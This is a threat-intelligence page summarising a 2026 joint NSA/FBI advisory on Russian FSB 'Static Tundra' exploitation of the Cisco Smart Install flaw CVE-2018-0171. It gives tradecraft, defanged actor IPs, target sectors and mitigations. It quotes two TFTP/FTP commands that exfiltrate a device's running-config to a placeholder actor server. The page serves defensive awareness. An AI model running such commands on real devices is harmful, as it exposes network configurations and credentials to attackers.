NSA/FBI Joint Advisory: Disable Cisco Smart Install to Block Russian FSB "Static Tundra" Exploitation of CVE-2018-0171 — Threadlinqs Intelligence
As of 2026-07-13, NSA/FBI Joint Advisory: Disable Cisco Smart Install to Block Russian FSB "Static Tundra" Exploitation of CVE-2018-0171 is a critical-severity vulnerability threat attributed to Static Tundra (Russia), tracked by Threadlinqs Intelligence with 9 detection rules (Splunk SPL, Microsoft KQL, Sigma) and 18 indicators of compromise.
Threat ID: TL-2026-1279 · Severity: CRITICAL · CVSS: 9.8 · Status: ACTIVE · Category: VULNERABILITY
Attribution: Static Tundra · Russia · ESPIONAGE
NSA, FBI, CISA, DoD Cyber Crime Center, and 14 international partner agencies issued joint advisory AA26-194A (July 9, 2026) attributing sustained exploitation of the legacy Cisco Smart Install
On July 9, 2026, NSA, FBI, CISA, the DoD Cyber Crime Center (DC3), and 14 international partner agencies (Australia, Canada, New Zealand, UK, Czech Republic, Denmark, Estonia, Finland, France, Italy, Poland, Sweden) published joint advisory AA26-194A warning that Russian FSB Center 16 cyber actors, publicly tracked by Cisco Talos as "Static Tundra," are actively and broadly exploiting CVE-2018-0171, a seven-year-old critical vulnerability (CVSS 3.1: 9.8) in the Smart Install (SMI) feature of Cisco IOS and IOS XE software. Smart Install is a legacy zero-touch provisioning feature that listens on TCP port 4786; an unauthenticated remote attacker can send a malformed Smart Install message to trigger a buffer overflow (CWE-787) leading to a device reload, watchdog-initiated crash (denial of service), or arbitrary code execution, or to abuse the feature's design flaw (CWE-20, improper input validation) to alter device configuration directly.
Static Tundra is assessed with high confidence to be a Russian state-sponsored espionage actor and, with moderate confidence, a sub-cluster of Energetic Bear (aka BERSERK BEAR), a group publicly linked to the FSB's Center 16 unit in a 2022 U.S. Department of Justice indictment. The group has operated for over a decade (active since at least 2015) with an intensification of operations since 2021, and is assessed with moderate confidence to be associated with the historic 2015 "SYNful Knock" firmware implant campaign against Cisco routers.
Observed tradecraft follows a consistent pattern: actors first gain access to unpatched, end-of-life networking devices with Smart Install enabled and/or default or weak SNMP community strings ("public", "anonymous") exposed. They use SNMP to instruct the device to download a text file from actor-controlled infrastructure and append it to the running configuration, creating local accounts, modifying TACACS+ logging to reduce visibility, and establishing GRE tunnels for traffic redirection. Harvested configuration files, NetFlow data, and other device state are exfiltrated over outbound TFTP or FTP connections (e.g., `show running-config | redirect tftp://<actor-server>/conf_bckp` and `copy running-config ftp://<user>:<pass>@<actor-server>/output.txt`) to actor-controlled infrastructure, including IPs 185.141.24[.]222, 185.82.202[.]34, 185.141.24[.]28, and 185.82.200[.]181, active at various points between March 2023 and July 2025. Over the past year alone, the actors are assessed to have collected configuration files for thousands of networking devices associated with U.S. entities across critical infrastructure sectors. Cisco Talos reports the same activity cluster has separately targeted telecommunications, higher education, and manufacturing organizations across North America, Asia, Africa, and Europe, with intensified operations against Ukraine and its allies following the onset of the Russo-Ukrainian war in 2022. The campaign is related to, but distinct from, an April 2026 NSA/FBI warning on Russian GRU (APT28/Fancy Bear/Forest Blizzard) exploitation of TP-Link devices via CVE-2023-50224 ("Operation Masquerade"), and follows an August 2025 FBI Public Service Announcement (PSA250820) on the same Static Tundra activity.
The joint advisory recommends disabling Cisco Smart Install entirely (it has no legitimate use case in most production environments) or applying Cisco's March 2018 patch, migrating from legacy SNMPv1/v2c to SNMPv3, disabling Telnet in favor of SSH-only administrative access, enforcing Type 8 (password) and Type 6 (TACACS+ key) encryption, blocking TFTP/SMI/SNMP at the network perimeter, replacing default/weak credentials, auditing for unexpected configuration changes and logging gaps, and replacing unsupported end-of-life hardware.
Weaknesses (CWE)
CWE-787, CWE-20
Target sectors: defense industrial base, communications, energy, financial services, government administration, health, telecoms, higher education, manufacturing
Target regions: North America, Europe, Asia, Africa, ukraine
Detections & IOCs
As of 2026-07-28, this threat has 9 detection rule(s) across Splunk SPL, Microsoft KQL and Sigma, and 18 indicator(s) of compromise. Detection query text and full IOC values are available to authenticated users and programmatically via the Threadlinqs MCP server (Purple tier). View plans.
Community OSINT corroboration
1 of this threat's indicators have also been reported by the open-source security community, which observed at least one of them before this report was published. Community sightings are unverified and are kept separate from Threadlinqs' curated indicators. Indicator values, reporters and campaign linkage are available to authenticated Red-tier users.
VULNERABILITY, CRITICAL, threat intelligence, cybersecurity, CVE-2018-0171, T1583.003, T1190, T1078, T1110.001, T1136.001, T1601.001, T1562.008, T1070.003, T1601.001, T1018